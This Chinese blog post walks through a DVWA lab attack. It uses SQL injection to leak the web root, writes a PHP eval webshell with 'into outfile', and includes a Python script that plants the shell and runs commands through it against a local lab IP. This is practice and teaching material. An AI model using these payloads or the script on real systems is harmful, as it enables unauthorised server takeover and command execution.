2. 程式人生 > >DVWA從註入到GETSHELL

DVWA從註入到GETSHELL

阿新 發佈:2018-01-06
共勉 ria head gets mysql cep min cookie 流程

好好過你的生活,不要老是忙著告訴別人你在幹嘛。

最近在復習學過的東西,自己就重新搭了個dvwa來學習新思路,寫一些簡單的腳本來練習寫代碼的能力。

眾所周知SQL註入的危害是相當大的,對於每個老司機來說,如果發現註入點並可以利用的話,除了脫褲當然是猜解出管理員的用戶名密碼,後臺登陸上傳webshell了,雖然這些過程並不一定一路通順,只是一般的流程,中途會遇到各種各樣的問題,這些以後再說,當我這個菜比都學會了在分享出來吧。

今天我們說說利用sql註入漏洞寫入webshell。當我們發現了註入漏洞,但是卻找不到後臺,該怎麽辦呢,如果數據庫管理員權限比較大的話,我們可以通過sql註入向網站寫入shell。

寫入webshell的前提條件:

1.select into outfile方法可用(允許導出文件)

2.我們需要知道網站所在的絕對路徑

3.我們有足夠的權限

首先我們確定了註入點,接下來就是爆一下網站的絕對路徑:

在輸入框中輸入,1‘ union select ‘x‘,‘x‘ into outfile ‘xx‘ -- 利用錯誤的sql語句,使數據庫報錯並返回絕對路徑

技術分享圖片

現在已經獲得了網站的絕對路徑,接下來就是利用sql註入寫shell了,在輸入框中插入 1‘ union select "<?php @eval($_GET[‘cmd‘])?>","hello admin" into outfile ‘C:\\

phpStudy\\PHPTutorial\\WWW\\dvwa\\hello.php‘ (需要註意,是兩個"\") 點擊提交,我們看一下是否上傳成功

技術分享圖片

當我們輸入 select ‘xx‘ into outfile ‘xxxx/xx/xx‘ -- 時 可能會遇到一下情況:

技術分享圖片

解決辦法:找到my.ini文件 在最後一行加上一句 secure_file_prv="/"重啟mysql即可。

============================================================附上自己寫的自動化辣雞代碼=========================================================================

# -*- utf-8 -*-
import requests
import re


headers = {
	
‘Accept‘:‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8‘,
‘Accept-Encoding‘:‘gzip, deflate‘,
‘Accept-Language‘:‘zh-CN,zh;q=0.8‘,
‘Cache-Control‘:‘max-age=0‘,
‘Connection‘:‘keep-alive‘,
‘Cookie‘:‘security=low; PHPSESSID=pie6uqttjqtnadq1b5dp8640u1‘,
‘Host‘:‘192.168.86.129‘,
‘Referer‘:‘http://192.168.86.129/dvwa/security.php‘,
‘Upgrade-Insecure-Requests‘:‘1‘,
‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36‘

}

url = raw_input(‘url:‘)
print ‘=‘*15,u‘大爺稍等‘,‘=‘*15
payload = ‘%27+union+select+"<%3Fphp+%40eval%28%24_GET%5B%27cmd%27%5D%29%3F>"%2C"hello+admin"+into+outfile+%27C%3A%5C%5CphpStudy%5C%5CPHPTutorial%5C%5CWWW%5C%5Cdvwa%5C%5Chello.php%27+--+&Submit=Submit#‘
url1 = requests.get(url+payload,headers=headers)
url2 = ‘http://192.168.86.129/dvwa/hello.php‘
url3 = requests.get(url2,headers=headers)
url4 = re.findall(‘<body>(.*?)</body>‘,url3.text)
if ‘hello‘ in url3.text:
	print u‘webshell已寫入,路徑為:http://192.168.86.129/dvwa/hello.php‘
else:
	print u‘寫入失敗‘
print u‘大爺您請便!‘
url5 = ‘http://192.168.86.129/dvwa/hello.php?cmd=‘
url6 = raw_input()
url7 = requests.get(url5+url6,headers=headers)
url8 = re.findall(‘<body>(.*?)</body>‘,url7.content)

print url7.content

  

技術分享圖片

以此記錄自己學過的知識,以防忘記,每天進步一點,共勉。

DVWA從註入到GETSHELL

相關推薦

DVWAGETSHELL

共勉 ria head gets mysql cep min cookie 流程 好好過你的生活,不要老是忙著告訴別人你在幹嘛。 最近在復習學過的東西,自己就重新搭了個dvwa來學習新思路,寫一些簡單的腳本來練習寫代碼的能力。 眾所周知SQL註入的危害是相當大的,對

記一次dvwa sql爆庫

dvwasql註入 python安裝 sqlmap安裝及使用 一 前期準備1 sqlmap在windows環境下需要python2.7的支持,在python官網下載即可https://www.python.org/2 安裝python2.7,默認即可。安裝完成後需要配置下環境變量。右擊計算機-&g

《11招玩轉網絡安全》之第四招:low級別的DVWA SQL

password nta 下載 測試 gin isp 圖像 default 下一步 以DVWA為例,進行手工註入,幫助讀者了解註入原理和過程。 1、啟動docker,並在終端中執行命令: docker ps -a docker start LocalDVWA doc

《11招玩轉網絡安全》之第五招:DVWA命令

返回 直接 term keditor plugins Edito 服務器 進行 cti 首先還是將DVWA的安全級別設置為Low,然後單擊DVWA頁面左側的Command Injection按鈕。圖5-1 Low級別的命令註入這個就是最典型的命令註入接口。在文本框中輸入一

php命令函數及dvwa命令實踐

net c89 linux命令 不知道 cte 若是 狀態 知識擴展 當前 命令註入漏洞 註:命令註入漏洞的分析,及含有命令註入漏洞的函數解析 含有命令註入漏洞的函數:system()、exec()、passthru()、shell_exec()、``(與shell_exe

dvwa——命令&文件包含

腳本 command 這樣的 我們 特定 得到 pen isset 要求 命令註入 commond_injection 源碼、分析、payload: low: <?php if( isset( $_POST[ 'Submit' ] ) ) {

mysqlgetshell

webshell echo 滲透測試 mysql註入 sqlmap SQL註入就是一種通過操作輸入(可以是表單,可以是get請求,也可以是POST請求等)相關SQL語句,並且能讓該語句在數據庫中得以執行,從而進行攻擊的技術。最主要的原因就是沒有對用戶輸入數據的合法性或者說是客戶端提

DVWA下的盲<SQLmap工具>

sql註入 網絡安全 入門學習 LOW難度!!!所需工具: DVWA環境、抓包工具、sqlmap抓包工具用fiddler為例。=====================================先進入DVWA調整模式為LOW打開抓包工具,確定可以抓到http流量包DVWA下選擇SQL盲註,隨

XerCMS-1.0.3代碼審計(文件名報錯後臺getshell)

each orb his jpg pla module 將不 last self 鏈接:https://share.weiyun.com/6b98e41d036967178e1a21fb88ed340f (密碼:YnNY) 文件名報錯註入 index.php?m=memb

《Java入門到放棄》入門篇:spring中IOC的姿勢

java ioc spring IOC到底是個什麽東東呢?控制反轉(Inversion of Control,英文縮寫為IoC),其實就是這個東東。你隨便百度一下就會得到比較書面的解釋:通過引入實現了IoC模式的IoC容器,即可由IoC容器來管理對象的生命周期、依賴關系等,從而使得應用程序的配置和

[轉]使用@Test 也可以spring容器中獲取依賴

oca fig article ring1 detail ice 如果 text resource 轉自:http://blog.csdn.net/u010987379/article/details/52091790 @RunWith(SpringJUnit4Cla

DVWA平臺v1.8-SQL

內容 res 單引號 src order 分享 i++ 技術分享 base 代碼 <?php if(isset($_GET[‘Submit‘])){ // Retrieve data $id = $_GET[‘

SQL(dvwa環境)

esp dvwa 發現 bili .net resp 報錯 rom 字段 首先登錄DVWA主頁: 1、修改安全級別為LOW級(第一次玩別打臉),如圖中DVWA Security頁面中。 2、進入SQL Injection頁面,出錯了。(心裏想著這DVWA是官網下的不至於玩

DVWA篇之SQL

DVWA SQL註入 WEB SQL Injection本文需要的實驗環境及搭建請訪問:DVWA篇之環境搭建 SQL註入就是通過把sql語句插入到web表單提交或輸入頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令 Sql註入的一般流程: 1、判斷註入點2、判斷註入類型3、判斷數據庫類

c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

Spring 基礎知識 - 依賴

ans factory control 自己 int pac java str actor 所謂的依賴註入是指容器負責創建對象和維護對象間的依賴關系,而不是通過對象本身負責自己的創建和解決自己的依賴。 依賴註入主要目的是為了解耦,體現了一種“組合”的理念。 無論是xml配置

Spring中使用Map、Set、List、數組、屬性集合的方法配置文件

查看 main list highlight 配置 spring配置 pla lec while (1)下邊的一個Java類包含了所有Map、Set、List、數組、屬性集合等這些容器,主要用於演示spring的註入配置; [java] view plain c

SQL原理講解及防範

ant htm part 無效 快樂 日常 field users lib 原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,國內最大的程序員社區CSDN網站

談談PHP網站的防SQL

效果 query 數據庫服務 data sqlite nbsp lds esc informix SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W

spring依賴的好處

源代碼 依賴 沒有 舉例 new 打開 pri 維護 eat spring依賴註入的好處,舉例子說明 舉個例子,比如你寫Apple apple = new Apple();People people = new People();people.eat(apple); 然後